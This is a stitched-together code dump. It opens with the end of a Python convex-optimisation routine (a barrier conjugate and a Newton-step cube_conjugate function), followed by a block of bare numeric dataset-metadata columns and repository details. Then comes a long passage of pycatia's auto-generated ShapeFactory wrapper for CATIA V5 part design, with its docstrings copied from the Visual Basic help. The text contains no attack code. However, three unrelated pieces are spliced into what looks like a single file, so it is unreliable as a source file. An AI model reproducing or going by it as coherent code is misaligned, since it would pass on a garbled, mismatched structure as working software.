elif mode == 'grad':
return np.nan * np.ones(self.shape)
elif mode == 'both':
return np.inf, np.nan * np.ones(self.shape)
else:
raise ValueError('mode incorrectly specified')
orthant_maximizer = (- 0.5*self.barrier_scale) + np.sqrt((0.25*(self.barrier_scale**2)) -
(self.barrier_scale / orthant_arg))
if np.any(np.isnan(orthant_maximizer)):
raise ValueError('maximizer is nan')
orthant_val = np.sum(orthant_maximizer * orthant_arg -
np.log(1 + (self.barrier_scale / orthant_maximizer)))
cube_maximizer, neg_cube_val = cube_conjugate(cube_arg, self.lagrange)
if np.any(np.isnan(cube_maximizer)):
raise ValueError('cube maximizer is nan')
cube_val = -neg_cube_val
if mode == 'func':
return cube_val + orthant_val
elif mode == 'grad':
g = np.zeros(self.shape)
g[self.cube_bool] = cube_maximizer
g[self.orthant_bool] = orthant_maximizer
return g
elif mode == 'both':
g = np.zeros(self.shape)
g[self.cube_bool] = cube_maximizer
g[self.orthant_bool] = orthant_maximizer
return cube_val + orthant_val, g
else:
raise ValueError('mode incorrectly specified')
def cube_conjugate(cube_argument,
lagrange,
nstep=100,
initial=None,
lipschitz=0,
tol=1.e-10):
k = cube_argument.shape[0]
if initial is None:
current = lagrange * 0.5
else:
current = initial
current_value = np.inf
step = np.ones(k, np.float)
linear = linear_map(cube_argument)
objective = lambda z: cube_barrier_scaled(z, lagrange) - linear.smooth_objective(z, 'func')
for itercount in range(nstep):
newton_step = ((cube_gradient_scaled(current, lagrange) - cube_argument)/
(cube_hessian_scaled(current, lagrange) + lipschitz))
# make sure proposal is a descent
count = 0
while True:
proposal = current - step * newton_step
proposed_value = objective(proposal)
if proposed_value <= current_value:
break
step *= 0.5
# stop if relative decrease is small
if np.fabs(current_value - proposed_value) < tol * np.fabs(current_value):
current = proposal
current_value = proposed_value
break
current = proposal
current_value = proposed_value
if itercount % 4 == 0:
step *= 2
value = objective(current)
return current, value
| 35.564179
| 125
| 0.512213
| 2,708
| 23,828
| 4.319055
| 0.065362
| 0.050274
| 0.02565
| 0.021631
| 0.879873
| 0.862517
| 0.840373
| 0.837124
| 0.835585
| 0.835585
| 0
| 0.01902
| 0.375567
| 23,828
| 669
| 126
| 35.617339
| 0.767054
| 0.133121
| 0
| 0.85906
| 0
| 0
| 0.030659
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044743
| false
| 0
| 0.006711
| 0
| 0.158837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8b7990c002f266bfc1c7a84c2b0ea916a8932fb
| 156,241
|
py
|
Python
|
pycatia/part_interfaces/shape_factory.py
|
evereux/catia_python
|
08948585899b12587b0415ce3c9191a408b34897
|
[
"MIT"
] | 90
|
2019-02-21T10:05:28.000Z
|
2022-03-19T01:53:41.000Z
|
pycatia/part_interfaces/shape_factory.py
|
Luanee/pycatia
|
ea5eef8178f73de12404561c00baf7a7ca30da59
|
[
"MIT"
] | 99
|
2019-05-21T08:29:12.000Z
|
2022-03-25T09:55:15.000Z
|
pycatia/part_interfaces/shape_factory.py
|
Luanee/pycatia
|
ea5eef8178f73de12404561c00baf7a7ca30da59
|
[
"MIT"
] | 26
|
2019-04-04T06:31:36.000Z
|
2022-03-30T07:24:47.000Z
|
#! usr/bin/python3.6
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-06-11 12:40:47.360445
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from pycatia.mec_mod_interfaces.body import Body
from pycatia.mec_mod_interfaces.factory import Factory
from pycatia.part_interfaces.add import Add
from pycatia.part_interfaces.assemble import Assemble
from pycatia.part_interfaces.auto_draft import AutoDraft
from pycatia.part_interfaces.auto_fillet import AutoFillet
from pycatia.part_interfaces.chamfer import Chamfer
from pycatia.part_interfaces.circ_pattern import CircPattern
from pycatia.part_interfaces.close_surface import CloseSurface
from pycatia.part_interfaces.const_rad_edge_fillet import ConstRadEdgeFillet
from pycatia.part_interfaces.defeaturing import Defeaturing
from pycatia.part_interfaces.draft import Draft
from pycatia.part_interfaces.face_fillet import FaceFillet
from pycatia.part_interfaces.groove import Groove
from pycatia.part_interfaces.hole import Hole
from pycatia.part_interfaces.intersect import Intersect
from pycatia.part_interfaces.mirror import Mirror
from pycatia.part_interfaces.pad import Pad
from pycatia.part_interfaces.pocket import Pocket
from pycatia.part_interfaces.rect_pattern import RectPattern
from pycatia.part_interfaces.remove import Remove
from pycatia.part_interfaces.remove_face import RemoveFace
from pycatia.part_interfaces.replace_face import ReplaceFace
from pycatia.part_interfaces.rib import Rib
from pycatia.part_interfaces.scaling import Scaling
from pycatia.part_interfaces.sew_surface import SewSurface
from pycatia.part_interfaces.shaft import Shaft
from pycatia.part_interfaces.shell import Shell
from pycatia.part_interfaces.slot import Slot
from pycatia.part_interfaces.solid_combine import SolidCombine
from pycatia.part_interfaces.split import Split
from pycatia.part_interfaces.stiffener import Stiffener
from pycatia.part_interfaces.thick_surface import ThickSurface
from pycatia.part_interfaces.thickness import Thickness
from pycatia.part_interfaces.thread import Thread
from pycatia.part_interfaces.trim import Trim
from pycatia.part_interfaces.tritangent_fillet import TritangentFillet
from pycatia.part_interfaces.user_pattern import UserPattern
from pycatia.part_interfaces.var_rad_edge_fillet import VarRadEdgeFillet
from pycatia.sketcher_interfaces.sketch import Sketch
from pycatia.system_interfaces.any_object import AnyObject
from pycatia.in_interfaces.reference import Reference
class ShapeFactory(Factory):
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| System.IUnknown
| System.IDispatch
| System.CATBaseUnknown
| System.CATBaseDispatch
| System.AnyObject
| MecModInterfaces.Factory
| ShapeFactory
|
| Represents the factory for shapes to create all kinds of shapes that may be
| needed for part design.
|
| The ShapeFactory mission is to build from scratch shapes that will be used
| within the design process of parts. Those shapes have a strong mechanical
| built-in knowledge, such as chamfer or hole, and in most cases apply
| contextually to the part being designed. When created, they become part of the
| definition of whichever body or shape that is current at that time. After they
| are created, they become in turn the current body or shape. In most cases,
| shapes are created from a factory with a minimum number of parameters. Other
| shapes parameters may be set further on by using methods offered by the shape
| itself.
"""
def __init__(self, com_object):
super().__init__(com_object)
self.shape_factory = com_object
def add_new_add(self, i_body_to_add: Body) -> Add:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewAdd(Body iBodyToAdd) As Add
|
| Creates and returns a new add operation within the current
| body.
|
| Parameters:
|
| iBodyToAdd
| The body to add to the current body
|
| Returns:
| The created add operation
:param Body i_body_to_add:
:return: Add
:rtype: Add
"""
return Add(self.shape_factory.AddNewAdd(i_body_to_add.com_object))
def add_new_affinity2(self, x_ratio: float, y_ratio: float, z_ratio: float) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewAffinity2(double XRatio,
| double YRatio,
| double ZRatio) As AnyObject
|
| Creates and returns a Affinity feature.
|
| Parameters:
|
| XRatio
| Value for the XRatio.
| YRatio
| Value for the YRatio.
| ZRatio
| Value for the ZRatio.
|
| Returns:
| the created Affinity feature.
:param float x_ratio:
:param float y_ratio:
:param float z_ratio:
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.shape_factory.AddNewAffinity2(x_ratio, y_ratio, z_ratio))
def add_new_assemble(self, i_body_to_assemble: Body) -> Assemble:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewAssemble(Body iBodyToAssemble) As Assemble
|
| Creates and returns a new assembly operation within the current
| body.
|
| Parameters:
|
| iBodyToAssemble
| The body to assemble with the current body
|
| Returns:
| The created assembly operation
:param Body i_body_to_assemble:
:return: Assemble
:rtype: Assemble
"""
return Assemble(self.shape_factory.AddNewAssemble(i_body_to_assemble.com_object))
def add_new_auto_draft(self, i_draft_angle: float) -> AutoDraft:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewAutoDraft(double iDraftAngle) As AutoDraft
|
| Creates and returns a new solid autodraft.
| Use this method to create autodraft by providing draft
| angle.
|
| Parameters:
|
| iDraftAngle
| The draft angle.
|
| Returns:
| The created autodraft.
:param float i_draft_angle:
:return: AutoDraft
:rtype: AutoDraft
"""
return AutoDraft(self.shape_factory.AddNewAutoDraft(i_draft_angle))
def add_new_auto_fillet(self, i_fillet_radius: float, i_round_radius: float) -> AutoFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewAutoFillet(double iFilletRadius,
| double iRoundRadius) As AutoFillet
|
| Creates and returns a new solid autofillet.
| Use this method to create autofillet by providing fillet and round radius
| values.
|
| Parameters:
|
| iFilletRadius
| The fillet radius
| iRoundRadius
| The round radius
|
| Returns:
| The created autofillet
:param float i_fillet_radius:
:param float i_round_radius:
:return: AutoFillet
:rtype: AutoFillet
"""
return AutoFillet(self.shape_factory.AddNewAutoFillet(i_fillet_radius, i_round_radius))
def add_new_axis_to_axis2(self, i_reference: Reference, i_target: Reference) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewAxisToAxis2(Reference iReference,
| Reference iTarget) As AnyObject
|
| Creates and returns an AxisToAxis transformation feature.
|
| Parameters:
|
| iReference
| The reference axis.
| iTarget
| The target axis.
|
| Returns:
| The created AxisToAxis transformation feature.
:param Reference i_reference:
:param Reference i_target:
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.shape_factory.AddNewAxisToAxis2(i_reference.com_object, i_target.com_object))
def add_new_blend(self) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewBlend() As AnyObject
|
| Creates and returns a new Blend feature.
|
| Returns:
| The created Blend feature
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.shape_factory.AddNewBlend())
def add_new_chamfer(self, i_object_to_chamfer: Reference, i_propagation: int, i_mode: int, i_orientation: int,
i_length1: float, i_length2_or_angle: float) -> Chamfer:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewChamfer(Reference iObjectToChamfer,
| CatChamferPropagation iPropagation,
| CatChamferMode iMode,
| CatChamferOrientation iOrientation,
| double iLength1,
| double iLength2OrAngle) As Chamfer
|
| Creates and returns a new chamfer within the current body.
|
| Parameters:
|
| iObjectToChamfer
| The first edge or face to chamfer
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iPropagation
| Controls if and how the chamfering operation should propagate beyond
| the first chamfer element iObjectToChamfer, when it is an edge
|
| iMode
| Controls if the chamfer is defined by two lengthes, or by an angle and
| a length
| The value of this argument changes the way the arguments iLength1 and
| iLength2OrAngle should be interpreted.
| iOrientation
| Defines the relative meaning of arguments iLength1 and iLength2OrAngle
| when defining a chamfer by two lengthes
| iLength1
| The first value for chamfer dimensioning. It represents the chamfer
| first length if the chamfer is defined by two lengthes, or the chamfer length
| if the chamfer is defined by a length and an angle.
| iLength2OrAngle
| The second value for chamfer dimensioning. It represents the chamfer
| second length if the chamfer is defined by two lengthes, or the chamfer angle
| if the chamfer is defined by a length and an angle.
| Returns:
| The created chamfer
:param Reference i_object_to_chamfer:
:param int i_propagation:
:param int i_mode:
:param int i_orientation:
:param float i_length1:
:param float i_length2_or_angle:
:return: Chamfer
:rtype: Chamfer
"""
return Chamfer(
self.shape_factory.AddNewChamfer(i_object_to_chamfer.com_object, i_propagation, i_mode, i_orientation,
i_length1, i_length2_or_angle))
def add_new_circ_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_radial_dir: int,
i_nb_of_copies_in_angular_dir: int, i_step_in_radial_dir: float,
i_step_in_angular_dir: float, i_shape_to_copy_position_along_radial_dir: int,
i_shape_to_copy_position_along_angular_dir: int, i_rotation_center: Reference,
i_rotation_axis: Reference, i_is_reversed_rotation_axis: bool, i_rotation_angle: float,
i_is_radius_aligned: bool) -> CircPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewCircPattern(AnyObject iShapeToCopy,
| long iNbOfCopiesInRadialDir,
| long iNbOfCopiesInAngularDir,
| double iStepInRadialDir,
| double iStepInAngularDir,
| long iShapeToCopyPositionAlongRadialDir,
| long iShapeToCopyPositionAlongAngularDir,
| Reference iRotationCenter,
| Reference iRotationAxis,
| boolean iIsReversedRotationAxis,
| double iRotationAngle,
| boolean iIsRadiusAligned) As CircPattern
|
| Creates and returns a new circular pattern within the current
| body.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the circular pattern
| iNbOfInstancesInRadialDir
| The number of times iShapeToCopy will be copied along pattern
| radial direction
| iNbOfInstancesInAngularDir
| The number of times iShapeToCopy will be copied along pattern
| angular direction
| iStepInRadialDir
| The distance that will separate two consecutive copies in the
| pattern along its radial direction
| iStepInAngularDir
| The angle that will separate two consecutive copies in the pattern
| along its angular direction
| iShapeToCopyPositionAlongRadialDir
| Specifies the position of the original shape iShapeToCopy among its
| copies along the radial direction
| iShapeToCopyPositionAlongAngularDir
| Specifies the position of the original shape iShapeToCopy among its
| copies along the angular direction
| iRotationCenter
| The point or vertex that specifies the pattern center of rotation
|
| iRotationAxis
| The line or linear edge that specifies the axis around which
| instances will be rotated relative to each other
| The following
|
| Boundary objects are supported: PlanarFace , CylindricalFace ,
| RectilinearTriDimFeatEdge and RectilinearBiDimFeatEdge.
|
| iIsReversedRotationAxis
| The boolean flag indicating wether the natural orientation of
| iRotationAxis should be used to orient the pattern operation. A value of true
| indicates that iItemToDuplicate are copied in the direction of the natural
| orientation of iRotationAxis.
| iRotationAngle
| The angle applied to the direction iRotationAxis prior to applying the
| pattern. The original shape iShapeToCopy is used as the rotation center.
| Nevertheless, the copied shapes themselves are not rotated. This allows the
| definition of a circular pattern relatively to existing geometry, but not
| necessarily parallel to it.
| iIsRadiusAligned
| The boolean flag that specifies whether the instances of
| iItemToDuplicate copied by the pattern should be kept parallel to each other
| (True) or if they should be aligned with the radial direction they lie upon
| (False).
| Returns:
| The created circular pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_radial_dir:
:param int i_nb_of_copies_in_angular_dir:
:param float i_step_in_radial_dir:
:param float i_step_in_angular_dir:
:param int i_shape_to_copy_position_along_radial_dir:
:param int i_shape_to_copy_position_along_angular_dir:
:param Reference i_rotation_center:
:param Reference i_rotation_axis:
:param bool i_is_reversed_rotation_axis:
:param float i_rotation_angle:
:param bool i_is_radius_aligned:
:return: CircPattern
:rtype: CircPattern
"""
return CircPattern(
self.shape_factory.AddNewCircPattern(i_shape_to_copy.com_object, i_nb_of_copies_in_radial_dir,
i_nb_of_copies_in_angular_dir, i_step_in_radial_dir,
i_step_in_angular_dir, i_shape_to_copy_position_along_radial_dir,
i_shape_to_copy_position_along_angular_dir,
i_rotation_center.com_object, i_rotation_axis.com_object,
i_is_reversed_rotation_axis, i_rotation_angle, i_is_radius_aligned))
def add_new_circ_patternof_list(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_radial_dir: int,
i_nb_of_copies_in_angular_dir: int, i_step_in_radial_dir: float,
i_step_in_angular_dir: float, i_shape_to_copy_position_along_radial_dir: int,
i_shape_to_copy_position_along_angular_dir: int, i_rotation_center: Reference,
i_rotation_axis: Reference, i_is_reversed_rotation_axis: bool,
i_rotation_angle: float, i_is_radius_aligned: bool) -> CircPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewCircPatternofList(AnyObject iShapeToCopy,
| long iNbOfCopiesInRadialDir,
| long iNbOfCopiesInAngularDir,
| double iStepInRadialDir,
| double iStepInAngularDir,
| long iShapeToCopyPositionAlongRadialDir,
| long iShapeToCopyPositionAlongAngularDir,
| Reference iRotationCenter,
| Reference iRotationAxis,
| boolean iIsReversedRotationAxis,
| double iRotationAngle,
| boolean iIsRadiusAligned) As CircPattern
|
| V5R8 Only: Creates and returns a new circular pattern within the current
| body using a list of shapes.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the circular pattern. Others shapes will
| be add by put_ItemToCopy with CATIAPattern interface
|
| iNbOfInstancesInRadialDir
| The number of times iShapeToCopy will be copied along pattern
| radial direction
| iNbOfInstancesInAngularDir
| The number of times iShapeToCopy will be copied along pattern
| angular direction
| iStepInRadialDir
| The distance that will separate two consecutive copies in the
| pattern along its radial direction
| iStepInAngularDir
| The angle that will separate two consecutive copies in the pattern
| along its angular direction
| iShapeToCopyPositionAlongRadialDir
| Specifies the position of the original shape iShapeToCopy among its
| copies along the radial direction
| iShapeToCopyPositionAlongAngularDir
| Specifies the position of the original shape iShapeToCopy among its
| copies along the angular direction
| iRotationCenter
| The point or vertex that specifies the pattern center of rotation
|
| iRotationAxis
| The line or linear edge that specifies the axis around which
| instances will be rotated relative to each other
| iIsReversedRotationAxis
| The boolean flag indicating wether the natural orientation of
| iRotationAxis should be used to orient the pattern operation. A value of true
| indicates that iItemToDuplicate are copied in the direction of the natural
| orientation of iRotationAxis.
| iRotationAngle
| The angle applied to the direction iRotationAxis prior to applying
| the pattern. The original shape iShapeToCopy is used as the rotation center.
| Nevertheless, the copied shapes themselves are not rotated. This allows the
| definition of a circular pattern relatively to existing geometry, but not
| necessarily parallel to it.
| iIsRadiusAligned
| The boolean flag that specifies whether the instances of
| iItemToDuplicate copied by the pattern should be kept parallel to each other
| (True) or if they should be aligned with the radial direction they lie upon
| (False).
|
| Returns:
| The created circular pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_radial_dir:
:param int i_nb_of_copies_in_angular_dir:
:param float i_step_in_radial_dir:
:param float i_step_in_angular_dir:
:param int i_shape_to_copy_position_along_radial_dir:
:param int i_shape_to_copy_position_along_angular_dir:
:param Reference i_rotation_center:
:param Reference i_rotation_axis:
:param bool i_is_reversed_rotation_axis:
:param float i_rotation_angle:
:param bool i_is_radius_aligned:
:return: CircPattern
:rtype: CircPattern
"""
return CircPattern(
self.shape_factory.AddNewCircPatternofList(i_shape_to_copy.com_object, i_nb_of_copies_in_radial_dir,
i_nb_of_copies_in_angular_dir, i_step_in_radial_dir,
i_step_in_angular_dir, i_shape_to_copy_position_along_radial_dir,
i_shape_to_copy_position_along_angular_dir,
i_rotation_center.com_object, i_rotation_axis.com_object,
i_is_reversed_rotation_axis, i_rotation_angle,
i_is_radius_aligned))
def add_new_close_surface(self, i_close_element: Reference) -> CloseSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewCloseSurface(Reference iCloseElement) As
| CloseSurface
|
| Creates and returns a new CloseSurface feature.
|
| Parameters:
|
| iCloseElement
| The skin that will be closed and add with the current body
|
|
| Returns:
| The created CloseSurface feature
:param Reference i_close_element:
:return: CloseSurface
:rtype: CloseSurface
"""
return CloseSurface(self.shape_factory.AddNewCloseSurface(i_close_element.com_object))
def add_new_defeaturing(self) -> Defeaturing:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewDefeaturing() As Defeaturing
|
| Creates and returns a new defeaturing operation within the current
| container.
|
| Returns:
| The created defeaturing operation
:return: Defeaturing
:rtype: Defeaturing
"""
return Defeaturing(self.shape_factory.AddNewDefeaturing())
def add_new_draft(self, i_face_to_draft: Reference, i_neutral: Reference, i_neutral_mode: int, i_parting: Reference,
i_dir_x: float, i_dir_y: float, i_dir_z: float, i_mode: int, i_angle: float,
i_multiselection_mode: int) -> Draft:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewDraft(Reference iFaceToDraft,
| Reference iNeutral,
| CatDraftNeutralPropagationMode iNeutralMode,
| Reference iParting,
| double iDirX,
| double iDirY,
| double iDirZ,
| CatDraftMode iMode,
| double iAngle,
| CatDraftMultiselectionMode iMultiselectionMode) As Draft
|
| Creates and returns a new draft within the current body.
| The draft needs a reference face on the body. This face will remain
| unchanged in the draft operation, while faces adjacent to it and specified for
| drafting will be rotated by the draft angle.
|
| Parameters:
|
| iFaceToDraft
| The first face to draft in the body. This face should be adjacent
| to the iFaceToDraft face. If several faces are to be drafted, only the first
| one is specified here, the others being inferred by propagating the draft
| operation onto faces adjacent to this first face. This is controlled by the
| iNeutralMode argument.
| The following
|
| Boundary object is supported: Face.
| iNeutral
| The reference face for the draft. The draft needs a reference face on
| the body, that will remain unchanged in the draft operation, while faces
| adjacent to it and specified for drafting will be rotated according to the
| draft angle iAngle.
| The following Boundary object is supported:
| PlanarFace.
| iNeutralMode
| Controls if and how the drafting operation should be propagated beyond
| the first face to draft iFaceToDraft to other adjacent faces.
|
| iParting
| The draft parting plane, face or surface. It specifies the element
| within the body to draft that represents the bottom of the mold. This element
| can be located either somewhere in the middle of the body or be one of its
| boundary faces. When located in the middle of the body, it crosses the faces to
| draft, and as a result, those faces are drafted with a positive angle on one
| side of the parting surface, and with a negative angle on the other
| side.
| The following Boundary object is supported:
| PlanarFace.
| iDirX,iDirY,iDirZ
| The X, Y, and Z components of the absolute vector representing the
| drafting direction (i.e. the mold extraction direction).
|
| iMode
| The draft connecting mode to its reference face iFaceToDraft
|
| iAngle
| The draft angle
| iMultiselectionMode.
| The elements to be drafted can be selected explicitly or can implicitly
| selected as neighbors of the neutral face
| Returns:
| The created draft
:param Reference i_face_to_draft:
:param Reference i_neutral:
:param int i_neutral_mode:
:param Reference i_parting:
:param float i_dir_x:
:param float i_dir_y:
:param float i_dir_z:
:param int i_mode:
:param float i_angle:
:param int i_multiselection_mode:
:return: Draft
:rtype: Draft
"""
return Draft(self.shape_factory.AddNewDraft(i_face_to_draft.com_object, i_neutral.com_object, i_neutral_mode,
i_parting.com_object, i_dir_x, i_dir_y, i_dir_z, i_mode, i_angle,
i_multiselection_mode))
def add_new_edge_fillet_with_constant_radius(self, i_edge_to_fillet: Reference, i_propag_mode: int,
i_radius: float) -> ConstRadEdgeFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewEdgeFilletWithConstantRadius(Reference
| iEdgeToFillet,
| CatFilletEdgePropagation iPropagMode,
| double iRadius) As ConstRadEdgeFillet
|
| Deprecated:
| V5R14 #AddNewEdgeFilletWithConstantRadius use
| AddNewSolidEdgeFilletWithConstantRadius or
| AddNewSurfaceEdgeFilletWithConstantRadius depending on the type of fillet you
| want to create
:param Reference i_edge_to_fillet:
:param int i_propag_mode:
:param float i_radius:
:return: ConstRadEdgeFillet
:rtype: ConstRadEdgeFillet
"""
return ConstRadEdgeFillet(
self.shape_factory.AddNewEdgeFilletWithConstantRadius(i_edge_to_fillet.com_object, i_propag_mode, i_radius))
def add_new_edge_fillet_with_varying_radius(self, i_edge_to_fillet: Reference, i_propag_mode: int,
i_variation_mode: int, i_default_radius: float) -> VarRadEdgeFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewEdgeFilletWithVaryingRadius(Reference
| iEdgeToFillet,
| CatFilletEdgePropagation iPropagMode,
| CatFilletVariation iVariationMode,
| double iDefaultRadius) As VarRadEdgeFillet
|
| Deprecated:
| V5R14 #AddNewEdgeFilletWithVaryingRadius use
| AddNewSolidEdgeFilletWithVaryingRadius or
| AddNewSurfaceEdgeFilletWithVaryingRadius depending on the type of fillet you
| want to create
:param Reference i_edge_to_fillet:
:param int i_propag_mode:
:param int i_variation_mode:
:param float i_default_radius:
:return: VarRadEdgeFillet
:rtype: VarRadEdgeFillet
"""
return VarRadEdgeFillet(
self.shape_factory.AddNewEdgeFilletWithVaryingRadius(i_edge_to_fillet.com_object, i_propag_mode,
i_variation_mode, i_default_radius))
def add_new_face_fillet(self, i_f1: Reference, i_f2: Reference, i_radius: float) -> FaceFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewFaceFillet(Reference iF1,
| Reference iF2,
| double iRadius) As FaceFillet
|
| Deprecated:
| V5R14 #AddNewFaceFillet use AddNewSolidFaceFillet or
| AddNewSurfaceFaceFillet depending on the type of fillet you want to create
:param Reference i_f1:
:param Reference i_f2:
:param float i_radius:
:return: FaceFillet
:rtype: FaceFillet
"""
return FaceFillet(self.shape_factory.AddNewFaceFillet(i_f1.com_object, i_f2.com_object, i_radius))
def add_new_gsd_circ_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_radial_dir: int,
i_nb_of_copies_in_angular_dir: int, i_step_in_radial_dir: float,
i_step_in_angular_dir: float, i_shape_to_copy_position_along_radial_dir: int,
i_shape_to_copy_position_along_angular_dir: int, i_rotation_center: Reference,
i_rotation_axis: Reference, i_is_reversed_rotation_axis: bool, i_rotation_angle: float,
i_is_radius_aligned: bool, i_complete_crown: bool, i_type: float) -> CircPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewGSDCircPattern(AnyObject iShapeToCopy,
| long iNbOfCopiesInRadialDir,
| long iNbOfCopiesInAngularDir,
| double iStepInRadialDir,
| double iStepInAngularDir,
| long iShapeToCopyPositionAlongRadialDir,
| long iShapeToCopyPositionAlongAngularDir,
| Reference iRotationCenter,
| Reference iRotationAxis,
| boolean iIsReversedRotationAxis,
| double iRotationAngle,
| boolean iIsRadiusAligned,
| boolean iCompleteCrown,
| double iType) As CircPattern
|
| Deprecated:
| V5R15 #AddNewSurfacicCircPattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_radial_dir:
:param int i_nb_of_copies_in_angular_dir:
:param float i_step_in_radial_dir:
:param float i_step_in_angular_dir:
:param int i_shape_to_copy_position_along_radial_dir:
:param int i_shape_to_copy_position_along_angular_dir:
:param Reference i_rotation_center:
:param Reference i_rotation_axis:
:param bool i_is_reversed_rotation_axis:
:param float i_rotation_angle:
:param bool i_is_radius_aligned:
:param bool i_complete_crown:
:param float i_type:
:return: CircPattern
:rtype: CircPattern
"""
return CircPattern(
self.shape_factory.AddNewGSDCircPattern(i_shape_to_copy.com_object, i_nb_of_copies_in_radial_dir,
i_nb_of_copies_in_angular_dir, i_step_in_radial_dir,
i_step_in_angular_dir, i_shape_to_copy_position_along_radial_dir,
i_shape_to_copy_position_along_angular_dir,
i_rotation_center.com_object, i_rotation_axis.com_object,
i_is_reversed_rotation_axis, i_rotation_angle, i_is_radius_aligned,
i_complete_crown, i_type))
def add_new_gsd_rect_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_dir1: int,
i_nb_of_copies_in_dir2: int, i_step_in_dir1: float, i_step_in_dir2: float,
i_shape_to_copy_position_along_dir1: int, i_shape_to_copy_position_along_dir2: int,
i_dir1: Reference, i_dir2: Reference, i_is_reversed_dir1: bool,
i_is_reversed_dir2: bool, i_rotation_angle: float, i_type: float) -> RectPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewGSDRectPattern(AnyObject iShapeToCopy,
| long iNbOfCopiesInDir1,
| long iNbOfCopiesInDir2,
| double iStepInDir1,
| double iStepInDir2,
| long iShapeToCopyPositionAlongDir1,
| long iShapeToCopyPositionAlongDir2,
| Reference iDir1,
| Reference iDir2,
| boolean iIsReversedDir1,
| boolean iIsReversedDir2,
| double iRotationAngle,
| double iType) As RectPattern
|
| Deprecated:
| V5R15 #AddNewSurfacicRectPattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_dir1:
:param int i_nb_of_copies_in_dir2:
:param float i_step_in_dir1:
:param float i_step_in_dir2:
:param int i_shape_to_copy_position_along_dir1:
:param int i_shape_to_copy_position_along_dir2:
:param Reference i_dir1:
:param Reference i_dir2:
:param bool i_is_reversed_dir1:
:param bool i_is_reversed_dir2:
:param float i_rotation_angle:
:param float i_type:
:return: RectPattern
:rtype: RectPattern
"""
return RectPattern(self.shape_factory.AddNewGSDRectPattern(i_shape_to_copy.com_object, i_nb_of_copies_in_dir1,
i_nb_of_copies_in_dir2, i_step_in_dir1,
i_step_in_dir2, i_shape_to_copy_position_along_dir1,
i_shape_to_copy_position_along_dir2,
i_dir1.com_object, i_dir2.com_object,
i_is_reversed_dir1, i_is_reversed_dir2,
i_rotation_angle, i_type))
def add_new_groove(self, i_sketch: Sketch) -> Groove:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewGroove(Sketch iSketch) As Groove
|
| Creates and returns a new groove within the current body.
| The Revolution, as a supertype for grooves, provides starting and ending
| angles for the groove definition.
|
| Parameters:
|
| iSketch
| The sketch defining the groove section. The sketch must contain a
| contour and an axis that will be used to rotate the contour in the space, thus
| defining the groove. The contour has to penetrate in 3D space the current
| shape.
|
| Returns:
| The created groove
:param Sketch i_sketch:
:return: Groove
:rtype: Groove
"""
return Groove(self.shape_factory.AddNewGroove(i_sketch.com_object))
def add_new_groove_from_ref(self, i_profile_elt: Reference) -> Groove:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewGrooveFromRef(Reference iProfileElt) As Groove
|
| Creates and returns a new groove within the current body.
|
| Parameters:
|
| iProfileElt
| The reference on the element defining the groove base
|
|
| Returns:
| The created groove
